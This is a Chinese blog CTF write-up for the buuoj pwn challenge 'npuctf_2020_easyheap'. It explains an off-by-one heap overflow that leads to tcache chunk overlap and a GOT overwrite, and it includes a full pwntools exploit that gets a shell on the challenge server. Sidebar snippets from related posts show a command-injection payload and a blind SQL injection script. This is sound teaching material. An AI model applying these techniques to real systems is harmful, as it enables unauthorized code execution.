buuoj刷题记录 - npuctf_2020_easyheap

最新推荐文章于 2023-04-23 20:59:42 发布
最新推荐文章于 2023-04-23 20:59:42 发布
阅读量168 收藏
点赞数
分类专栏: pwn入门 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34010404/article/details/123755565
版权

在这里插入图片描述
题目给了add,show,edit,del函数

问题在edit函数里面,重新编辑的时候可以溢出一个字节

在这里插入图片描述
看一下create函数,只能分配大小为 24,和56的空间
思路:覆盖下一个chunk的chunksize低字节达到修改chunk的大小,free 的时候会放到更大的tcache bin里面,之后malloc的时候会造成chunk重叠.

下面是我的构造方法:
在这里插入图片描述
把利用 0 把1中chunk2的size 改掉,改成0x40, (一会malloc的时候用到,注意只能分配大小为 56 和 24 的空间,(8字节的奇数倍会使用下一个chunk 的prev size 块))

然后free掉1,chunk2和chunk3就会被分别丢到0x40,和0x20的tcache bin里面了.

重新add一个,大小为56,就会得到两个重叠的chunk。
之后就是改指针到got,修改got就可以了

exp:

from pwn import*
#sh = process('./pwn')
sh = remote('node4.buuoj.cn',26063)
def create(size,payload):
    sh.sendlineafter(b'choice :',b'1')
    sh.sendlineafter(b'Size of Heap(0x10 or 0x20 only) : ',str(size).encode())
    sh.sendlineafter(b'Content:',payload)
    sh.recvuntil(b'Done!')

def Edit(idx,payload):
    sh.sendlineafter(b'choice :',b'2')
    sh.sendlineafter(b'Index :',str(idx).encode())
    sh.sendlineafter(b'Content: ',payload)
    sh.recvuntil(b'Done!')

def Show(idx):
    sh.sendlineafter(b'choice :',b'3')
    sh.sendlineafter(b'Index :',str(idx).encode())
    sh.recvuntil(b'\nContent : ')
    data = sh.recvline()[:-1]
    sh.recvuntil(b'Done!')
    return data

def Delete(idx):
    sh.sendlineafter(b'choice :',b'4')
    sh.sendlineafter(b'Index :',str(idx).encode())
    sh.recvuntil(b'Done !')

#24,56
create(24,b'emmm')
create(24,b'emmm')

payload = b'a' * 24 + b'\x41'
Edit(0,payload)
Delete(1)

create(56,b'emmm')

payload = b'a' * 32 + p64(8) + p64(0x0602058)
Edit(1,payload)

libc_base = u64(Show(1).ljust(8,b'\x00')) - 0x40680
system = libc_base + 0x4f440

log.success('libc_base:%x ',libc_base)
log.success('system:%x ',system)

Edit(1,p64(system))
sh.sendlineafter(b'choice :',b'sh\x00')
sh.interactive()
Suspend.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUOJ-Web-刷题记录
x0r
09-01 338
为提升观感体验,本篇博文长期更新,新题目以二次编辑形式附在最后 [ACTF2020 新生赛]Exec 打开后发现网页是关于执行一个ping指令,经过测试是直接执行的,所以就直接命令执行了 127.0.0.1 | cat /flag 总结一下常见的Linux管道符 |按位或,直接执行|后面的语句 ||逻辑或,如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 &按位与,&a...
buuoj刷题记录2
臭nana的博客
06-11 264
[GYCTF2020]Ezsqli 首先从题目名字就能知道这是道SQL注入题 打开题目测一下,输入1打印Nu1L,输入2打印V&N,其他的数字是报没有查询结果的错 加个单引号试试,显示bool(false) 布尔盲注 import requests url = "http://0a02ac5a-9801-4b63-a153-6d331955650d.node3.buuoj.cn/index.php" database = "" key='' for i in range(1
buuoj刷题记录 - ciscn_2019_final_3
qq_34010404的博客
03-25 412
看了大佬们的思路才做出来的,这里只记录一下做题中踩的坑。 1.add函数 2.del函数 free后没有把数组元素标记为0,存在UAF漏洞. 思路是:1.double free 改fd 到 另一个chunk 的首地址处,然后修改chunksize ,原因是程序限制了分配大小为120字节,free到unsorted bin里面。 2.free chunk 到unsorted bin里面 3.double free 修改fd 到第二步中的chunk,之后便可以malloc 到unsorted bin处,然后
buuoj刷题记录 - babyfengshui_33c3_2016
qq_34010404的博客
03-16 130
检查程序保护: 拖进IDA看一下,add,show,edit,free 有一个全局的数组,每一个元素是一个地址,执行一个User结构体。 分析一下可以知道User结构体大概是这样子: struct User { char* szUserDescription; char szUserName[124]; } add函数: add函数调用了readDescription函数: 其中存在问题的就位于该函数内,该函数在Update内被会被调用. add函数内需要注意的一个地方,就是readDescrip
buuoj刷题记录 - [极客大挑战 2019]Not Bad
qq_34010404的博客
03-28 315
检查一下保护: 程序很简单,存在栈溢出漏洞,只能溢出16个字节。 只允许orw系统调用. 前八个字节用来jmp rsp ,紧接着加上5个字节近转移 call到buff的开始处执行. 这样就可以往buf里面写gadget来往指定地址处读入shellcode 之后跳转到shellcode把flag读出来 exp: from pwn import* #sh = process('./pwn') sh = remote('node4.buuoj.cn',29515) context.arch= 'x86_6
buuoj re逆向49-64题writeup(截图+c++源码+过程).doc
12-31
文章上传不了,用word的形式上传,buuoj re 逆向49-64题writeup(截图+c++源码+过程)
buuoj re逆向1-64题writeup(截图+c++源码+过程).rar
12-31
buuoj re逆向1-64题writeup(截图+c++源码+过程) 与前面发的一模一样,只不过打包了,喜欢的可以支持一下
java外贸网站源码-buuoj:浮标
06-05
java外贸网站源码 LPOJ 一个基于Vue.js和Django的轻量级在线评测系统 目前应用于广东外语外贸大学 演示地址: 说明文档: 简述 轻量级,易于部署和自定义定制 前后端分离,提高服务器性能 支持多机器多进程判题,判...
buuojweb刷题wp详解及知识整理—-【护网杯】easy_tornado(模板注入+md5)
01-20
写在前面 服务端模板注入也是一种注入攻击(简称为SSTL) 这又涉及到了本人的知识盲区 借这个题学习补充一下知识 自己走过的路加wp辅助 信息收集加思路推理 ...回显 render 而且url处有异常 同理测试其他选项 ...
cmcc_simplerop
01-07
io=remote('node3.buuoj.cn',27913) io.recvuntil(':') # Padding goes here p = 'a'*0x14+p32(1)*3 p += pack('<I', 0x0806e82a) # pop edx ; ret p += pack('<I', 0x080ea060) # @ .data p += pack('<I',...
buuoj刷题笔记
q1415500189的博客
01-22 868
buuoj
BUU刷题记录
as you know, nlp is fantasitc!
08-10 383
这个文章的知识点包括 sql注入中的异或盲注、preg_match的绕过(%0a绕过,prce限制)、basename去掉ascii码字符的情况。
BUUWeb刷题记录
dangejinghong的博客
04-23 684
但是,如果要接着直接查这个flag就会出现问题了,select等关键词被过滤了,所以我们只能另辟蹊径,根据从网上大佬的wp学习,可以将。file=phar://压缩包/内部文件 phar://xxx.png/shell.php (zip要用#隔开,这个用/)file=php://filter/read=convert.base64-encode/resource=xxxx.php。发现他将空格过滤了,不过通过网上学习,发现可以用一些字符绕过空格,例如。
BUU刷题记录(四)
山高路远
04-12 449
以下几题的ciscn是我先抽出来做的,因为不久就是ciscn,所以看看之前的题目,先不按顺序 十七、ciscn_2019_n_3 照例checksec一下 开启了nx和canary,relro只开启部分,可以修改got表(后面没用到就是了) 进入ida看看反汇编代码 总共有着四个功能,第一个new note: 在第一个功能里面,可以创建一个堆,堆里面第一个存放的是printf函数指针,第二存放了一个free函数指针,第三个存放有区别,当type==1,存放的是一个数据,type ==2,存放的是字符串
[BUUCTF]PWN——npuctf_2020_easyheap
mcmuyanga的博客
01-20 745
npuctf_2020_easyheap 附件 步骤: 例行检查
[buuctf]刷题记录web
qq_61109509的博客
05-12 583
文章目录pingpingping[极客大挑战]http pingpingping 打开后发现要传ip,想到ping命令,先尝试传入127.1.1.1 但是当我们打开flag.php时,发现 /?ip= fxck your space! 说明空格过滤。但是当我们绕过空格时,发现<,%09,$IFS都不起作用 原因是用 $IFS的话,会认为解析没结束,会把后面的也当做参数解析,而 $IFS$9的话,结束了 $IFS 后加上了一个不存在或者说空字符串的变量。所以解析为空,但结束了 $IFS正常执行后面
npuctf_2020_easyheap详解
像初雪一样自由洒落
04-25 813
off by one的题,,, 参考视频:off by one + 改got表的heap做法 例题:npuctf_2020_easyheap 程序流程 create: 申请两个chunk: 一个heaparray[i](固定0x10大小),一个是申请的大小(只能申请0x18或0x38) edit: read_input(heaparray[(signed int)v1][1], *heaparray[(signed int)v1] + 1LL); 存在off by one show:根据id.
[BUUCTF]PWN——[ZJCTF 2019]EasyHeap
mcmuyanga的博客
12-16 465
[ZJCTF 2019]EasyHeap 附件 步骤: 例行检查,64位程序 试运行一下看看程序大概执行的情况,经典的堆块的菜单 64位ida载入,首先检索字符串,发现了读出flag的函数 看一下每个选项的函数 add 这边size的大小由我们输入控制,heaparray数组在bss段上存放着我们chunk的指针 edit,简单的根据指针修改对应chunk里的值,但是这里的size也是由我们手动输入的,也就是说只要我们这边输入的size比add的时候输入的size大就会造成溢出 delete,释
[BUUCTF-pwn]——[ZJCTF 2019]EasyHeap
Y_peak的博客
11-16 884
[BUUCTF-pwn]——[ZJCTF 2019]EasyHeap 思路 我们第一个想法肯定是执行l33t这个函数,事实证明被摆了一道。没有结果, 但是我们有system函数我们可以将其放入我们可以操控的函数,比如printf、puts、gets、free等函数的got表,通过传入/bin/sh来解决。利用uaf就可以达到其目的。 exploit from pwn import * context(os='linux',arch='amd64',log_level='debug') p = remot
wireshark buuoj
最新发布
10-19
Wireshark是一款网络协议分析工具,可以帮助用户捕获和分析网络数据包。它可以用于网络故障排除、网络安全分析、网络通信协议开发等方面。而buuoj是一个CTF平台,提供了各种各样的CTF题目,包括网络安全、二进制安全、密码学等等。在CTF比赛中,Wireshark可以帮助选手分析网络流量,找到有用的信息,解决一些网络安全问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Suspend.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值